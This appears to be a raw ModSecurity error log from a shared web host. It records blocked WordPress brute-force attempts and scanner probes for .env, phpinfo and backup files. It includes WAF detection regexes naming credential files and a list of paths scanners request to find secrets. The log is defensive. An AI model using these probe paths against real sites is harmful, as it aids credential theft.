[Tue May 26 13:47:16.096680 2026] [security2:error] [pid 555743:tid 555761] [remote 95.211.96.182:40676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.96.211.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVXC8jqAquC0YaxQjCiKgABYxE"]
[Tue May 26 13:47:16.150223 2026] [security2:error] [pid 555743:tid 555910] [client 4.201.75.230:5475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVXDMjqAquC0YaxQjCiLwAAAS8"]
[Tue May 26 13:47:16.390136 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDMjqAquC0YaxQjCiNQAAAR8"]
[Tue May 26 13:47:16.405145 2026] [security2:error] [pid 555743:tid 555946] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXC8jqAquC0YaxQjCiLAAAAVM"]
[Tue May 26 13:47:17.162185 2026] [security2:error] [pid 555743:tid 555886] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiWQAAARc"]
[Tue May 26 13:47:17.621420 2026] [security2:error] [pid 555743:tid 555878] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiXgAAAQ8"]
[Tue May 26 13:47:17.835569 2026] [security2:error] [pid 555743:tid 555912] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiWwAAATE"]
[Tue May 26 13:47:17.868707 2026] [security2:error] [pid 555743:tid 555945] [client 45.148.10.159:49598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_phpinfo.php"] [unique_id "ahVXDcjqAquC0YaxQjCiZAAAAVI"]
[Tue May 26 13:47:17.918608 2026] [security2:error] [pid 544395:tid 544586] [client 208.91.198.85:14556] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXDRmrs7g3RMCdp8XtEgAAAD0"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:18.096997 2026] [security2:error] [pid 555743:tid 556000] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiZQAAAYk"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:18.759565 2026] [security2:error] [pid 555743:tid 555924] [client 51.68.236.73:26217] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahVXDsjqAquC0YaxQjCihAAAAT0"]
[Tue May 26 13:47:18.759722 2026] [security2:error] [pid 555743:tid 555924] [client 51.68.236.73:26217] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahVXDsjqAquC0YaxQjCihAAAAT0"]
[Tue May 26 13:47:19.307964 2026] [security2:error] [pid 555743:tid 555991] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXDsjqAquC0YaxQjCihwAAAYA"]
[Tue May 26 13:47:19.633342 2026] [security2:error] [pid 544395:tid 544622] [client 4.201.75.230:5649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-conf.php"] [unique_id "ahVXDxmrs7g3RMCdp8XtLQAAAGE"]
[Tue May 26 13:47:20.220841 2026] [security2:error] [pid 555743:tid 555970] [client 123.16.107.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXD8jqAquC0YaxQjCikgAAAWs"]
[Tue May 26 13:47:20.633778 2026] [security2:error] [pid 555743:tid 555792] [remote 211.23.68.235:2385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVXEMjqAquC0YaxQjCiqwABRDA"]
[Tue May 26 13:47:20.708171 2026] [security2:error] [pid 555743:tid 555874] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXEMjqAquC0YaxQjCitAAAAQs"]
[Tue May 26 13:47:20.901701 2026] [security2:error] [pid 555743:tid 555887] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXEMjqAquC0YaxQjCirQAAARg"]
[Tue May 26 13:47:21.421629 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:59903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXEcjqAquC0YaxQjCixQAAASM"]
[Tue May 26 13:47:21.421753 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:59903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXEcjqAquC0YaxQjCixQAAASM"]
[Tue May 26 13:47:21.601233 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:47250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_profiler/phpinfo/info.php"] [unique_id "ahVXEcjqAquC0YaxQjCiywAAAVc"]
[Tue May 26 13:47:22.442017 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:47260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVXEsjqAquC0YaxQjCi3gAAAR8"]
[Tue May 26 13:47:23.279177 2026] [security2:error] [pid 555743:tid 555909] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXE8jqAquC0YaxQjCi7AAAAS4"]
[Tue May 26 13:47:23.855343 2026] [security2:error] [pid 555743:tid 555933] [client 4.201.75.230:5494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahVXE8jqAquC0YaxQjCi9gAAAUY"]
[Tue May 26 13:47:23.978087 2026] [security2:error] [pid 544395:tid 544652] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXExmrs7g3RMCdp8XtTwAAAH8"]
[Tue May 26 13:47:24.066231 2026] [security2:error] [pid 555743:tid 555897] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXE8jqAquC0YaxQjCjAQAAASI"]
[Tue May 26 13:47:24.474987 2026] [security2:error] [pid 555743:tid 555884] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/awstats/.env"] [unique_id "ahVXFMjqAquC0YaxQjCjBQAAARU"]
[Tue May 26 13:47:24.744286 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/conf/.env"] [unique_id "ahVXFMjqAquC0YaxQjCjDQAAAVc"]
[Tue May 26 13:47:25.074997 2026] [security2:error] [pid 555743:tid 555982] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/cron/.env"] [unique_id "ahVXFcjqAquC0YaxQjCjDwAAAXc"]
[Tue May 26 13:47:25.090826 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXFMjqAquC0YaxQjCjCwAAAVU"]
[Tue May 26 13:47:25.201909 2026] [security2:error] [pid 544395:tid 544578] [client 66.249.66.33:64068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.jhonparra.com"] [uri "/index.php"] [unique_id "ahVXFBmrs7g3RMCdp8XtVQAAADU"]
[Tue May 26 13:47:25.311464 2026] [security2:error] [pid 555743:tid 555949] [client 129.222.147.134:21915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXFcjqAquC0YaxQjCjEwAAAVY"]
[Tue May 26 13:47:25.311703 2026] [security2:error] [pid 555743:tid 555949] [client 129.222.147.134:21915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXFcjqAquC0YaxQjCjEwAAAVY"]
[Tue May 26 13:47:26.054467 2026] [security2:error] [pid 555743:tid 555984] [client 192.95.82.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVXFcjqAquC0YaxQjCjFAAAAXk"]
[Tue May 26 13:47:26.065419 2026] [security2:error] [pid 555743:tid 555876] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/www/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjJwAAAQ0"]
[Tue May 26 13:47:26.301885 2026] [security2:error] [pid 555743:tid 555969] [client 4.201.75.230:6098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/abc.php"] [unique_id "ahVXFsjqAquC0YaxQjCjKAAAAWo"]
[Tue May 26 13:47:26.370334 2026] [security2:error] [pid 555743:tid 555878] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/docker/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjKwAAAQ8"]
[Tue May 26 13:47:26.672998 2026] [security2:error] [pid 555743:tid 555994] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/docker/app/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjNQAAAYM"]
[Tue May 26 13:47:26.979355 2026] [security2:error] [pid 555743:tid 555904] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/env.backup"] [unique_id "ahVXFsjqAquC0YaxQjCjOQAAASk"]
[Tue May 26 13:47:27.291321 2026] [security2:error] [pid 555743:tid 555882] [client 45.148.10.159:47276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/xampp/phpinfo.php"] [unique_id "ahVXF8jqAquC0YaxQjCjPgAAARM"]
[Tue May 26 13:47:27.658361 2026] [security2:error] [pid 555743:tid 555806] [remote 167.71.130.119:34634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVXF8jqAquC0YaxQjCjRwABHD4"]
[Tue May 26 13:47:28.179527 2026] [security2:error] [pid 555743:tid 555884] [client 4.201.75.230:6130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/abcd.php"] [unique_id "ahVXGMjqAquC0YaxQjCjVQAAARU"]
[Tue May 26 13:47:28.479170 2026] [security2:error] [pid 555743:tid 555939] [client 45.148.10.159:47290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/lara/info.php"] [unique_id "ahVXGMjqAquC0YaxQjCjXAAAAUw"]
[Tue May 26 13:47:28.918035 2026] [security2:error] [pid 555743:tid 555925] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXGMjqAquC0YaxQjCjWwAAAT4"]
[Tue May 26 13:47:29.580655 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.159:56182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/lara/phpinfo.php"] [unique_id "ahVXGRmrs7g3RMCdp8XtfQAAAGc"]
[Tue May 26 13:47:30.535354 2026] [security2:error] [pid 544395:tid 544570] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXGhmrs7g3RMCdp8XthQAAAC0"]
[Tue May 26 13:47:30.708757 2026] [security2:error] [pid 544395:tid 544648] [client 45.148.10.159:56188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/info.php"] [unique_id "ahVXGhmrs7g3RMCdp8XtigAAAHs"]
[Tue May 26 13:47:31.631931 2026] [security2:error] [pid 555743:tid 555976] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.vscode/.env"] [unique_id "ahVXG8jqAquC0YaxQjCjjgAAAXE"]
[Tue May 26 13:47:31.686907 2026] [security2:error] [pid 555743:tid 555941] [client 20.206.67.134:4972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXG8jqAquC0YaxQjCjjwAAAU4"], referer: www.google.com
[Tue May 26 13:47:31.687847 2026] [security2:error] [pid 544395:tid 544579] [client 20.206.67.134:4970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVXGxmrs7g3RMCdp8XtkwAAADY"], referer: www.google.com
[Tue May 26 13:47:31.938026 2026] [security2:error] [pid 555743:tid 555880] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/js/.env"] [unique_id "ahVXG8jqAquC0YaxQjCjlQAAARE"]
[Tue May 26 13:47:31.954141 2026] [security2:error] [pid 544395:tid 544564] [client 20.206.67.134:4935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/otexajjd.php"] [unique_id "ahVXGxmrs7g3RMCdp8XtmwAAACc"], referer: www.google.com
[Tue May 26 13:47:31.979485 2026] [security2:error] [pid 555743:tid 555997] [client 106.192.248.115:60220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXG8jqAquC0YaxQjCjlgAAAYY"]
[Tue May 26 13:47:31.987257 2026] [security2:error] [pid 555743:tid 555997] [client 106.192.248.115:60220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXG8jqAquC0YaxQjCjlgAAAYY"]
[Tue May 26 13:47:32.284158 2026] [security2:error] [pid 555743:tid 555918] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjogAAATc"]
[Tue May 26 13:47:32.531684 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXHMjqAquC0YaxQjCjnQAAAYI"]
[Tue May 26 13:47:32.592750 2026] [security2:error] [pid 555743:tid 555940] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/core/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjpAAAAU0"]
